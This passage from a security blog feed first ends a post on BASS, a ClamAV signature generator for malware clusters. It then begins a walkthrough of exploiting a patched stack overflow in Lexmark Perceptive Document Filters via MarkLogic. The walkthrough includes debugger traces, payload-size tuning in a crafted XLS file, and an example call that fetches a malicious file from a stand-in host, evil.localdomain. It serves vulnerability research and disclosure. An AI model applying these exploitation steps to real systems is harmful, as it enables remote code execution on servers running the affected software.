which are comparably faster and easier to maintain than bytecode signatures, but are able to identify a whole cluster of files instead of just a single file.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.ribhf5s2gk3v"&gt;BASS&lt;/h2&gt;&lt;br /&gt;BASS is meant to fill this gap. 
This framework is designed to generate ClamAV pattern signatures from chunks of binary executable code.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-psmrxw9tVRQ/WUltMweN-hI/AAAAAAAAARA/kIEHFSghNq8PA6PzQopBNLgoGbhrE5w9wCK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="156" src="https://4.bp.blogspot.com/-psmrxw9tVRQ/WUltMweN-hI/AAAAAAAAARA/kIEHFSghNq8PA6PzQopBNLgoGbhrE5w9wCK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B2.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;The framework ingests malware clusters. To keep the framework as simple and as flexible as possible, malware clustering is not part of BASS. The input interface is intentionally kept generic so that it is easily adaptable to new clustering sources. We currently use several cluster sources. A non-exhaustive list of our current sources is: Indicator of Compromise (IoC) clusters from our sandbox, structural hashing in cases where we have a known malicious executable and find additional samples through structural similarity, and malware gathered from spam campaigns.&lt;br /&gt;&lt;br /&gt;In a first step, the malware files are unpacked with ClamAV's unpackers. ClamAV can unpack and extract a wide range of archive formats, as well as packed executables (such as UPX-packed ones) and nested documents (such as an EXE file inside a Word document). The resulting artifacts are inspected to gather information. Currently, the filtering step uses the file size and the magic string from the Unix file tool.&lt;br /&gt;&lt;br /&gt;Next, the malware cluster is filtered. 
If files do not correspond to BASS' expected input (currently PE executables, though adding support for ELF and Mach-O binaries is trivial), they are removed from the cluster, or the cluster is outright rejected if not enough files remain.&lt;br /&gt;&lt;br /&gt;The filtered cluster then passes to the signature generation step. Here, the binaries are first disassembled. Currently we use IDA Pro as a disassembler, but other disassemblers like radare2 are able to produce the same information and could easily be swapped in as a replacement for IDA.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-FK8FMW-J4yg/WUltXJNmkbI/AAAAAAAAARI/4rl_B-yXw2EgQ2sc3sukhNP2QgM8XJAwwCK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B3.jpg" imageanchor="1"&gt;&lt;img border="0" height="240" src="https://2.bp.blogspot.com/-FK8FMW-J4yg/WUltXJNmkbI/AAAAAAAAARI/4rl_B-yXw2EgQ2sc3sukhNP2QgM8XJAwwCK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B3.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;After disassembly, we need to find common code between the samples from which signatures can be generated. This step is necessary for two reasons. The first is that the signature generation algorithm is computationally very expensive and works well on short chunks. The second is that having a signature on code which is not only syntactically but also semantically similar is preferable. We use BinDiff as a code comparison tool. Again, the tool should be easily exchangeable, and we might integrate other comparison tools in the future.&lt;br /&gt;&lt;br /&gt;In small clusters, BinDiff compares each executable with every other one. In bigger clusters, the number of comparisons is limited, as it would otherwise explode. 
A graph is built from the function similarities, where the functions are the nodes and the similarities are the edges. Finding a good common function amounts to finding a connected subgraph with high overall similarity.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-WVIP1nrvvZk/WUltgXBwPiI/AAAAAAAAARQ/f9HpN9vs1LoXHbW-Bp6v4QtNa5JbfAuaACK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B4.jpg" imageanchor="1"&gt;&lt;img border="0" height="284" src="https://1.bp.blogspot.com/-WVIP1nrvvZk/WUltgXBwPiI/AAAAAAAAARQ/f9HpN9vs1LoXHbW-Bp6v4QtNa5JbfAuaACK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B4.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;In the above example, the subgraph of ƒ1, ƒ2, ƒ4, ƒ6 is a good candidate for a common function, as the overall similarity is high.&lt;br /&gt;&lt;br /&gt;When a set of candidate functions in the binaries has been identified, the functions are checked against a function whitelist. This step helps to avoid generating signatures on benign library functions which have been statically linked into a sample. The functions are submitted to a &lt;a href="https://github.com/McGill-DMaS/Kam1n0-Plugin-IDA-Pro"&gt;Kam1n0&lt;/a&gt; instance, whose database we pre-populated with functions from known clean samples. If a clone of a function is found, the subgraph selection from above is repeated for the next-best subgraph. Otherwise, the function set is retained for the next step: signature generation.&lt;br /&gt;&lt;br /&gt;At this point, the actual signature generation can start. 
As ClamAV's pattern signatures are made to recognize subsequences in binary data, we apply an algorithm to all extracted functions to find the Longest Common Subsequence (LCS) between them (see the &lt;a href="#h.qhyihbwtpikq"&gt;Appendix&lt;/a&gt; for the difference between a Longest Common Substring and a Longest Common Subsequence).&lt;br /&gt;&lt;br /&gt;As the algorithm is already computationally expensive for two samples, and even more so for several samples, we implemented a heuristic version described by &lt;a href="https://static.googleusercontent.com/media/www.zynamics.com/en/downloads/blichmann-christian--diplomarbeit--final.pdf"&gt;C. Blichmann&lt;/a&gt;. An example output could look like this:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-cR8uLAFf7E0/WUltory1lCI/AAAAAAAAARY/bNpLkAqrom4ipqjdM2aRm5K1F7kLEIVvgCK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B6.jpg" imageanchor="1"&gt;&lt;img border="0" height="176" src="https://3.bp.blogspot.com/-cR8uLAFf7E0/WUltory1lCI/AAAAAAAAARY/bNpLkAqrom4ipqjdM2aRm5K1F7kLEIVvgCK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B6.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;Finally, the signature needs to be tested before it is published. We automatically validate the signature against our false positive test set. For further scrutiny, we use Sigalyzer, a new feature of our &lt;a href="https://github.com/Cisco-Talos/CASC"&gt;CASC IDA Pro ClamAV signature generation and analysis plugin&lt;/a&gt; (which will be updated later). 
Sigalyzer highlights the matched parts of a binary given a ClamAV signature that triggers on that binary, and quickly gives the analyst a visual impression of the signature.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.p1y6216xvwbu"&gt;Architecture&lt;/h2&gt;&lt;br /&gt;BASS is implemented as a cluster of Docker containers. The framework is written in Python, and interacts with the tools it uses through web services. The architecture is inspired by &lt;a href="https://www.zynamics.com/vxclass.html"&gt;VxClass&lt;/a&gt;, which also used IDA Pro and BinDiff to generate ClamAV signatures, but was discontinued and, unlike BASS, is not publicly available.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-ctgZ4k7Kgj0/WUltttQTW_I/AAAAAAAAARg/SqiNVl5cCYg60WrRQUfH__F3t57OSuVSQCK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B7.jpg" imageanchor="1"&gt;&lt;img border="0" height="270" src="https://1.bp.blogspot.com/-ctgZ4k7Kgj0/WUltttQTW_I/AAAAAAAAARg/SqiNVl5cCYg60WrRQUfH__F3t57OSuVSQCK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B7.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2 id="h.4qsgjhpd52du"&gt;Limitations&lt;/h2&gt;&lt;br /&gt;BASS will only work on binary executables, because the signature is generated from the code section of the sample. Additionally, BASS will only analyze x86 and x86_64 binaries. Support for other architectures may be added in the future.&lt;br /&gt;&lt;br /&gt;We have observed that the framework does not work well on file infectors, which usually insert small and highly varying snippets of code into a host binary, and on backdoors, which contain large amounts of (sometimes stolen) non-malicious binary code together with some malicious functions. We are working on improving the clustering step to deal with these issues.&lt;br /&gt;&lt;br /&gt;Finally, be aware that BASS is currently in the Alpha stage and has some rough edges. 
Still, we hope to contribute to the community by open sourcing the framework and would gladly welcome any feedback and improvement suggestions.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.2ixwliz46arw"&gt;Appendix&lt;/h2&gt;&lt;br /&gt;&lt;h3 id="h.qhyihbwtpikq"&gt;Longest Common Substring versus Longest Common Subsequence&lt;/h3&gt;&lt;br /&gt;The following graphic illustrates the difference between a Longest Common Substring and a Longest Common Subsequence. In this blog post, we refer to the Longest Common Subsequence as LCS.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-bpEhcvlJZ-E/WUltzKWcDSI/AAAAAAAAARo/w-UwwajMo-ApxMciYHDQPg1wFjEVZg28ACK4BGAYYCw/s1600/061517%2BBASS%2Bblog_Figure%2B5.jpg" imageanchor="1"&gt;&lt;img border="0" height="328" src="https://4.bp.blogspot.com/-bpEhcvlJZ-E/WUltzKWcDSI/AAAAAAAAARo/w-UwwajMo-ApxMciYHDQPg1wFjEVZg28ACK4BGAYYCw/s640/061517%2BBASS%2Bblog_Figure%2B5.jpg" width="640" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=_iH94chsP2c:aQh3r7ZaIBE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-06-20T14:47:55.641-04:00</atom:updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://2.bp.blogspot.com/-pk1493FXOWQ/WUf8Wn4D6II/AAAAAAAABGA/PcekxM5hnPoEgzuJfyUoS3AiQvQqG72DQCLcBGAs/s72-c/BASS_logo_fullcolor_ondark.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/06/bass-signature.html</feedburner:origLink></item><item><title>Deep dive in Lexmark Perceptive Document Filters Exploitation</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/rf8H1U_G_y4/lexmark-perceptive-vuln-deep-dive.html</link><category>exploitation</category><category>Talos</category><category>vulndev</category><category>Vulnerability</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Wed, 14 Jun 2017 11:41:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-9128219403764961331</guid><description>&lt;i&gt;This post was authored by Marcin Noga with contributions from &lt;a href="https://twitter.com/infosec_nick"&gt;Nick Biasini&lt;/a&gt;&lt;/i&gt;&lt;br /&gt;&lt;h2 id="h.7ypzstvbxdpn"&gt;Introduction&lt;/h2&gt;Talos discovers and releases software vulnerabilities on a regular basis. We don't always publish a deep technical analysis of how the vulnerability was discovered or its potential impact. This blog will cover these technical aspects, including discovery and exploitation. Before we deep dive into the technical aspects of exploitation, let's start with an introduction to Lexmark Perceptive Document Filters and MarkLogic: specifically, how these products are connected and what their purpose is. 
There are articles across the Internet discussing these products and their purposes. Additionally, you can read the &lt;a href="http://www.lexmark.com/en_us/partners/enterprise-software/technology-partners/oem-technologies/document-filters.html"&gt;Perceptive Document Filters product description directly&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;In general, Perceptive Document Filters are used in Big Data, eDiscovery, DLP, email archival, content management, business intelligence, and intelligent capture. There are three major companies with product offerings in this space: Lexmark is one of them, with Oracle and HP being the other two.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Perceptive Document Filters are a set of libraries used to parse massive amounts of different file formats for many different purposes, some of which are listed above. As you can imagine, being such a big player in the market increases the impact of a discovered vulnerability in this product. Direct customers of the Lexmark solution are everywhere; one example can be found &lt;a href="http://www.businesswire.com/news/home/20061016005009/en/ISYS-Search-Software-Enables-Competitive-Advantage-LANsultant"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;The company's customers include large organizations. The size and diversity of their clients was one of the reasons Talos decided to dive deeply into not just the vulnerability discovery process but also the details of the exploitation.&lt;br /&gt;&lt;br /&gt;An example of an affected product using Perceptive Filters is the Enterprise NoSQL database by MarkLogic. 
The combination of the way MarkLogic uses Lexmark's solution and the lack of basic mitigation techniques makes MarkLogic a prime candidate to demonstrate the vulnerability and its impact.&lt;br /&gt;&lt;h2 id="h.sz7qu48hlso2"&gt;MarkLogic Impact&lt;/h2&gt;Before we get too deep into the technical aspects, here is a video demonstrating a working remote code execution exploit tested on MarkLogic 8.04 Linux x64:&lt;br /&gt;&lt;br /&gt;&lt;iframe allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/ilABOvr3wPg?list=PLFT-9JpKjRTDn_qtGN238gzycJfaVzMqD" width="560"&gt;&lt;/iframe&gt; &lt;br /&gt;MarkLogic is just one of many products that use Lexmark's Perceptive Document Filters as a solution to extract metadata from different types of documents. We can find both the Perceptive Document Filters libraries and the converter binary in the MarkLogic directory, as shown below:&lt;br /&gt;&lt;br /&gt;icewall@ubuntu:~$ ls -l /opt/MarkLogic/Converters/cvtisys/&lt;br /&gt;total 154612&lt;br /&gt;-rwxr-xr-x 1 root root   188976  convert&lt;br /&gt;drwxr-xr-x 2 root root     4096  fonts&lt;br /&gt;-rwxr-xr-x 1 root root    45568  libISYS11df.so&lt;br /&gt;-rwxr-xr-x 1 root root 47818992  libISYSautocad.so&lt;br /&gt;-rwxr-xr-x 1 root root  9575776  libISYSgraphics.so&lt;br /&gt;-rwxr-xr-x 1 root root 12376664  libISYSpdf6.so&lt;br /&gt;-rwxr-xr-x 1 root root 11419576  libISYSreadershd.so&lt;br /&gt;-rwxr-xr-x 1 root root  5389896  libISYSreaders.so&lt;br /&gt;-rwxr-xr-x 1 root root 30264056  libISYSshared.so&lt;br /&gt;&lt;br /&gt;The first question we need to answer is how to force MarkLogic to use this converter.&lt;br /&gt;&lt;br /&gt;MarkLogic uses this converter every time the XDMP API "&lt;a href="https://docs.marklogic.com/xdmp:document-filter"&gt;document-filter&lt;/a&gt;" is used. From the documentation we know that this API filters a variety of document formats, extracts metadata and text, and returns XHTML. 
The extracted text has very little formatting, and is typically used for searching, classification, or other text processing. An example of the usage of this particular API is shown below; it demonstrates the extraction of metadata from an untrusted source document.&lt;br /&gt;&lt;br /&gt;xdmp:document-filter(xdmp:http-get("http://www.evil.localdomain/malicious.xls")[2])&lt;br /&gt;&lt;br /&gt;When the above "document-filter" API is called, the MarkLogic daemon spawns the "convert" binary, which uses the Perceptive Document Filters libraries, which in turn are responsible for pulling the metadata out of the referenced file.&lt;br /&gt;&lt;h3 id="h.4721wzfkbir4"&gt;Increased damage&lt;/h3&gt;Monitoring the 'convert' process when it gets spawned by the MarkLogic daemon shows that the process is executed with the same privileges as the parent process, meaning that it is executed as `daemon`. This dramatically increases the impact of successful exploitation, because we will immediately gain access as one of the highest privileged accounts on the system.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-UclGlxM0MQA/WUFz6DsD83I/AAAAAAAABOc/7DxQjF_NTQo3IaTd-l_-Zr1w7M0pErlpQCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="471" data-original-width="1472" height="203" src="https://2.bp.blogspot.com/-UclGlxM0MQA/WUFz6DsD83I/AAAAAAAABOc/7DxQjF_NTQo3IaTd-l_-Zr1w7M0pErlpQCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Spawned convert process run with `daemon` privileges&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;h2 id="h.x7a8pvup9x4c"&gt;Recon&lt;/h2&gt;During the 
research into this product we found multiple vulnerabilities in the Lexmark libraries, but to demonstrate the exploitation process we decided to use &lt;a href="http://www.talosintelligence.com/reports/TALOS-2016-0172"&gt;TALOS-2016-0172 - Lexmark Perceptive Document Filters XLS Convert Code Execution Vulnerability&lt;/a&gt;. This particular vulnerability was patched on 08/06/2016. Running the `convert` binary under gdb and trying to pull metadata out of a malformed XLS file, we see the following:&lt;br /&gt;&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ cat config/config.cfg&lt;br /&gt;showhidden Visible&lt;br /&gt;inputfile /home/icewall/exploits/cvtisys/poc.xls&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ LD_LIBRARY_PATH=. gdb --args ./convert config/&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-FZ0DWlnhH78/WUF0GCwz_rI/AAAAAAAABOg/rLsycz40qkI_dSDk4MdGNR7kxvuq0SsgACLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="739" data-original-width="976" height="484" src="https://4.bp.blogspot.com/-FZ0DWlnhH78/WUF0GCwz_rI/AAAAAAAABOg/rLsycz40qkI_dSDk4MdGNR7kxvuq0SsgACLcBGAs/s640/image5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;After a quick analysis of the above gdb state, we know that this is a classic stack-based buffer overflow. Using `rr`, we return to the moment where the `ret address` has been overwritten.&lt;br /&gt;&lt;br /&gt;(rr) watch *0x7ffffffed128&lt;br /&gt;Hardware watchpoint 1: *0x7ffffffed128&lt;br /&gt;(rr) rc&lt;br /&gt;Continuing.&lt;br /&gt;&lt;br /&gt;Warning: not running or target is remote&lt;br /&gt;Hardware watchpoint 1: *0x7ffffffed128&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-EKJxr0TCJek/WUF0OEhkq5I/AAAAAAAABOk/jbQj6g6lhgc4dsAYWQYg4RP3s6UI6rPXQCLcBGAs/s1600/image13.png" imageanchor="1" 
style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="861" data-original-width="1434" height="384" src="https://2.bp.blogspot.com/-EKJxr0TCJek/WUF0OEhkq5I/AAAAAAAABOk/jbQj6g6lhgc4dsAYWQYg4RP3s6UI6rPXQCLcBGAs/s640/image13.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;OK, so we have landed inside memcpy. The next step will be to check the exact memcpy parameters used for this operation.&lt;br /&gt;&lt;br /&gt;(rr) reverse-finish&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-PcMZqw2DE6k/WUF0Uf46HzI/AAAAAAAABOo/xmR79lBTzZEXCBNih13XMNDbW7csU0pNwCLcBGAs/s1600/image20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="813" data-original-width="1156" height="450" src="https://4.bp.blogspot.com/-PcMZqw2DE6k/WUF0Uf46HzI/AAAAAAAABOo/xmR79lBTzZEXCBNih13XMNDbW7csU0pNwCLcBGAs/s640/image20.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;We see all the parameters; now we need to track their origins in order to determine how much control we have over them. The advisory mentions that the `size` parameter is read directly from the file and names the function where it happens, but below we will demonstrate how to find that place using the `rr` debugger. From the backtrace function names we can assume that the buffer size is first passed as a parameter in the `reader::escher::MsofbtDggContainer::Handle` function. 
Now we use reverse-finish a couple of times to return to the place inside `reader::escher::MsofbtDggContainer::Handle` where `ISYS_NS::CDataReader::Read` is called.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-qY45IUAtE8U/WUF0ZRrMYdI/AAAAAAAABOs/_VZop401pvgI2rNAy5TqtPmfQYaK5_PCgCLcBGAs/s1600/image23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="844" data-original-width="1440" height="374" src="https://3.bp.blogspot.com/-qY45IUAtE8U/WUF0ZRrMYdI/AAAAAAAABOs/_VZop401pvgI2rNAy5TqtPmfQYaK5_PCgCLcBGAs/s640/image23.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Here we see the memcpy `size` argument in the RDX register and also the place where it has been set:&lt;br /&gt;&lt;br /&gt;0x7ffff36185fa:        mov    edx,DWORD PTR [rsi+0x4]&lt;br /&gt;&lt;br /&gt;Next we return to the address `0x7ffff36185fa` by leveraging `rni`. Now, checking the memory content pointed to by `rsi+0x4` gives us:&lt;br /&gt;&lt;br /&gt;(rr) hexdump $rsi+0x4&lt;br /&gt;&lt;br /&gt;0x00007ffffffed144 : 00 03 00 00 00 12 00 00 00 00 00 00 00 00 00 00   ................&lt;br /&gt;&lt;br /&gt;As expected, we have found the value of interest. 
Now we set a watchpoint on it and see where it has been set:&lt;br /&gt;&lt;br /&gt;(rr) watch *0x00007ffffffed144&lt;br /&gt;&lt;br /&gt;Hardware watchpoint 4: *0x00007ffffffed144&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-BzPIESO_vPE/WUF0fBZvIgI/AAAAAAAABOw/-cGEGn5mIhUkeToW1qXJr60k2hRB-kfWACLcBGAs/s1600/image22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="878" data-original-width="1491" height="376" src="https://2.bp.blogspot.com/-BzPIESO_vPE/WUF0fBZvIgI/AAAAAAAABOw/-cGEGn5mIhUkeToW1qXJr60k2hRB-kfWACLcBGAs/s640/image22.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;(rr) pdisass&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-ye-fd1ncSD8/WUF0uCyxXNI/AAAAAAAABO0/-x4dfxp74hwgUprKdp54QSfdUhTWwQ0JwCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="560" data-original-width="1059" height="338" src="https://3.bp.blogspot.com/-ye-fd1ncSD8/WUF0uCyxXNI/AAAAAAAABO0/-x4dfxp74hwgUprKdp54QSfdUhTWwQ0JwCLcBGAs/s640/image3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Now we clearly see that the memcpy `size` argument is indeed read directly from the file via the `common::StreamReader::readInt32` function inside `common::read_MSOFBH`, and that it is a 32-bit integer value. Searching for this value in the file returns too many offsets. 
However, using the chain of values returned by all of these `readIntXX` functions gives us the exact offset of our `size` parameter:&lt;br /&gt;&lt;br /&gt;common::StreamReader::readInt16(ISYS_NS::CDataReader&amp;amp;) -&amp;gt; 03 08&lt;br /&gt;common::StreamReader::readInt16(ISYS_NS::CDataReader&amp;amp;) -&amp;gt; 16 00&lt;br /&gt;common::StreamReader::readInt32(ISYS_NS::CDataReader&amp;amp;) -&amp;gt; 00 30 00 00&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-rP0CLDSJNhk/WUF01Su36sI/AAAAAAAABO4/cv59W63xbDg_4zpNycMoo605F3Q_5TSBACLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="57" data-original-width="617" height="58" src="https://1.bp.blogspot.com/-rP0CLDSJNhk/WUF01Su36sI/AAAAAAAABO4/cv59W63xbDg_4zpNycMoo605F3Q_5TSBACLcBGAs/s640/image1.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Bingo! We see that this byte chain starts at offset 0xFCE and the `size` parameter value is at 0xFD2. 
This is confirmed when we return to the listing with the memcpy operation, as shown below.&lt;br /&gt;&lt;br /&gt;[-------------------------------------code-------------------------------------]&lt;br /&gt;0x7ffff475ef59:        mov    rdx,r12&lt;br /&gt;0x7ffff475ef5c:        add    rsi,rax&lt;br /&gt;0x7ffff475ef5f:        mov    r15,r12&lt;br /&gt;=&amp;gt; 0x7ffff475ef62:        call   0x7ffff4714fc8 &amp;lt;memcpy@plt&amp;gt;&lt;br /&gt;0x7ffff475ef67:        mov    eax,DWORD PTR [rsp+0x38]&lt;br /&gt;0x7ffff475ef6b:        mov    rbp,r12&lt;br /&gt;0x7ffff475ef6e:        add    rbp,QWORD PTR [r13+0x20]&lt;br /&gt;0x7ffff475ef72:        add    DWORD PTR [rsp+0x4],ebx&lt;br /&gt;&lt;br /&gt;Guessed arguments:&lt;br /&gt;arg[0]: 0x7ffffffed020 --&amp;gt; 0x0&lt;br /&gt;arg[1]: 0x678490 --&amp;gt; 0x82000165300081&lt;br /&gt;arg[2]: 0x300 &lt;br /&gt;&lt;br /&gt;We noticed that the `src buffer` (our payload) starts right after the `size` argument value, at offset 0xFD2. We will use OffVis to gain a bit more insight into the XLS structure around these values, to see how far they can be increased to make space for our gadgets and shellcode.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-0zdl4mOMeD4/WUF07KdsTvI/AAAAAAAABO8/wLBXtnJCqL4u_EipIzzkmvYwfsk8rPTqACLcBGAs/s1600/image14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="213" data-original-width="1381" height="98" src="https://3.bp.blogspot.com/-0zdl4mOMeD4/WUF07KdsTvI/AAAAAAAABO8/wLBXtnJCqL4u_EipIzzkmvYwfsk8rPTqACLcBGAs/s640/image14.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;We now have a clear view of the important structure fields. 
&lt;br /&gt;&lt;br /&gt;Now, one of the most important questions is whether or not we can increase the value of the 'size' argument to allow for exploitation (we need more space to store our payload) while ensuring the XLS document will still be treated as valid by the Lexmark library parser. In order to simplify this task and avoid dealing with the demanding XLS format, we will create a simple script which is responsible for setting the `size` field value and, according to that size, overwriting the original data in the file with our custom "A" string.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/--f8jDTWfMkI/WUF1AbiQveI/AAAAAAAABPA/VJ5TgfR516kQ-r9EM9pBxN0D9WrGH2B3wCLcBGAs/s1600/image10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="599" data-original-width="619" height="618" src="https://2.bp.blogspot.com/--f8jDTWfMkI/WUF1AbiQveI/AAAAAAAABPA/VJ5TgfR516kQ-r9EM9pBxN0D9WrGH2B3wCLcBGAs/s640/image10.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;span style="font-size: small; text-align: start;"&gt;&lt;i&gt;Through a trial-and-error process, plus observing the XLS structure around the payload a bit more closely, we managed to arrive at the size parameter value presented above.&lt;/i&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;Now it's time to generate payload.xls based on the template.xls file that originally caused the crash.&lt;br /&gt;&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ ./explo_test.py&lt;br /&gt;icewall@ubuntu:~/exploits/cvtisys$ LD_LIBRARY_PATH=. 
./convert test&lt;br /&gt;Segmentation fault&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-QWi0C67Y_O8/WUF1H24D7QI/AAAAAAAABPE/G8AiCk1dXUALNdB_21Ze1levSZbNlb7ogCLcBGAs/s1600/image24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="226" data-original-width="1600" height="90" src="https://3.bp.blogspot.com/-QWi0C67Y_O8/WUF1H24D7QI/AAAAAAAABPE/G8AiCk1dXUALNdB_21Ze1levSZbNlb7ogCLcBGAs/s640/image24.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;View of the generated payload.xls&lt;br /&gt;&lt;br /&gt;We can see that the `size` field has been changed to the value set in the script as `PAYLOAD_SIZE`, and the original data has been overwritten with the string of "A"s.&lt;br /&gt;&lt;br /&gt;It's also notable that during our testing we noticed that when increasing the `size` value we also needed to increase the value of the `MsoDrawingGroup` `Length` field, which is represented in the script as `RECORD_SIZE`. As we can see, the value of 0x300 set randomly during the fuzzing process could be increased to 0x958 without requiring any complicated data structure modifications. The reason for this size limit is easy to see by looking at the end of our payload block:&lt;br /&gt;&lt;br 